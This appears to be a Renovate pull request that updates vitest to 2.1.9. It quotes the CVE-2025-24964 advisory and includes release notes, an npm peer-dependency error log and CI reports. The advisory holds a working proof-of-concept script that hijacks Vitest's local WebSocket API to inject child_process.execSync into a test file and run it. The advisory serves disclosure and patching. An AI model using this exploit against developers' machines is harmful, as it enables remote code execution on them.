chore(deps): update dependency vitest to v2.1.9 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
vitest (source)	2.1.5 → 2.1.9

---

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2025-24964

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API.
https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC

1. Open Vitest UI.
2. Access a malicious web site with the script below.
3. If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.

// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

---

Release Notes

vitest-dev/vitest (vitest)

v2.1.9

Compare Source

This release includes security patches for:

• Browser mode serves arbitrary files | CVE-2025-24963
• Remote Code Execution when accessing a malicious website while Vitest API server is listening | CVE-2025-24964

   🐞 Bug Fixes

• backport #​7317 to v2 - by @​hi-ogawa in #​7318
• (backport #​7340 to v2) restrict served files from /__screenshot-error - by @​hi-ogawa in #​7343

    View changes on GitHub

v2.1.8

Compare Source

   🐞 Bug Fixes

• Support Node 21  -  by @​sheremet-va (92f7a)

    View changes on GitHub

v2.1.7

Compare Source

   🐞 Bug Fixes

• Revert support for Vite 6  -  by @​sheremet-va (fbe5c)
  • This introduced some breaking changes (#​6992). We will enable support for it later. In the meantime, you can still use pnpm.overrides or yarn resolutions to override the vite version in the vitest package - the APIs are compatible.

    View changes on GitHub

v2.1.6

Compare Source

🚀 Features

• Support Vite 6

    View changes on GitHub

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - "after 9am every weekday,before 5pm every weekday" (UTC).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: apps/blueorange/package-lock.json

npm warn Unknown env config "store". This will stop working in the next major version of npm.
npm error code ERESOLVE
npm error ERESOLVE could not resolve
npm error
npm error While resolving: @vitest/ui@2.1.5
npm error Found: vitest@2.1.9
npm error node_modules/vitest
npm error   dev vitest@"2.1.9" from the root project
npm error
npm error Could not resolve dependency:
npm error peer vitest@"2.1.5" from @vitest/ui@2.1.5
npm error node_modules/@vitest/ui
npm error   dev @vitest/ui@"2.1.5" from the root project
npm error
npm error Conflicting peer dependency: vitest@2.1.5
npm error node_modules/vitest
npm error   peer vitest@"2.1.5" from @vitest/ui@2.1.5
npm error   node_modules/@vitest/ui
npm error     dev @vitest/ui@"2.1.5" from the root project
npm error
npm error Fix the upstream dependency conflict, or retry
npm error this command with --force or --legacy-peer-deps
npm error to accept an incorrect (and potentially broken) dependency resolution.
npm error
npm error
npm error For a full report see:
npm error /runner/cache/others/npm/_logs/2026-01-08T17_06_25_890Z-eresolve-report.txt
npm error A complete log of this run can be found in: /runner/cache/others/npm/_logs/2026-01-08T17_06_25_890Z-debug-0.log

[github-actions]

Run report for 0f84fb4e (macos-latest, macOS, 0, 1, 1)

Total time: 1m 30s | Comparison time: 13m 51s | Estimated savings: 12m 21s (89.1% faster)

	Action	Time	Status	Info
🟩	SyncWorkspace	11.6ms	Passed
🟩	SyncProject(claude-code)	1.4ms	Passed
🟩	SyncProject(vendir)	1.9ms	Passed
🟩	SyncProject(devenv)	14.9ms	Passed
🟦	RunTask(claude-code:build)	7.3s	Cached
🟦	RunTask(vendir:build)	1m 29s	Cached
🟦	RunTask(devenv:test)	610.9ms	Cached

Environment

OS: macOS
Matrix:

os = macos-latest
name = macOS
index = 0
total = 1
job_number = 1

Variables:

MOON_TOOLCHAIN_FORCE_GLOBALS = true

Touched files

apps/blueorange/package.json

[github-actions]

Run report for 0f84fb4e (ubuntu-latest, Linux, 0, 2, 1)

Total time: 8.9ms | Comparison time: 0s | Estimated loss: 8.9ms (100.0% slower)

	Action	Time	Status	Info
🟩	SyncWorkspace	8.9ms	Passed

Environment

OS: Linux
Matrix:

os = ubuntu-latest
name = Linux
index = 0
total = 2
job_number = 1

Variables:

MOON_TOOLCHAIN_FORCE_GLOBALS = true

Touched files

apps/blueorange/package.json

[github-actions]

Run report for 0f84fb4e (ubuntu-latest, Linux, 1, 2, 2)

Total time: 6.8s | Comparison time: 15.2s | Estimated savings: 8.4s (55.2% faster)

	Action	Time	Status	Info
🟩	SyncWorkspace	8.9ms	Passed
🟩	SyncProject(escaperoom)	0.2ms	Passed
🟩	SyncProject(blueorange)	0.4ms	Passed
🟦	RunTask(escaperoom:test)	1.1s	Cached
🟥	RunTask(blueorange:install)	6.8s	Failed
⬛️	RunTask(blueorange:test)	0.1ms	Skipped
⬛️	RunTask(blueorange:build)	0.2ms	Skipped

Environment

OS: Linux
Matrix:

os = ubuntu-latest
name = Linux
index = 1
total = 2
job_number = 2

Variables:

MOON_TOOLCHAIN_FORCE_GLOBALS = true

Touched files

apps/blueorange/package.json